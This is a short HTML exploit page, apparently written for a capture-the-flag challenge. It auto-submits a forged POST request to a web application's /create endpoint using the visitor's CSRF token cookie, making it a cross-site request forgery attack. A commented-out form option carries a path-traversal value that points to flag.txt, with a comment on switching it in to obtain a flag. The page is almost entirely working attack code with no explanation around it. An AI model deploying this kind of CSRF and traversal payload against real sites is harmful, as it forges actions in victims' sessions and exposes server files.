<form id="fo" action="https://web.kazet.cc:42448/create" method="POST">
  <input type="hidden" id="my" name="csrfmiddlewaretoken" value="getCookie('sessionid')">
  <input type="text" name="recipient" value="kanshaodoroki">
  <input type="text" name="content" value="hi from admin">
  <select name="template" class="form-control" aria-label="Szablon">
    <option value="normal" selected="">Zwykły</option>
    <!-- <option value="../../../../../../../../../../flag.txt" selected="">flag.txt</option> -->
    <!-- uncomment second and comment first to get the flag (2) flag -->
  </select>
</form>
<script>
  function getCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; i++) {
      var c = ca[i];
      while (c.charAt(0) == ' ') c = c.substring(1, c.length);
      if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
    }
    return null;
  }

  document.getElementById("my").value = getCookie("csrftoken");
  document.onload = document.getElementById("fo").submit();

</script>
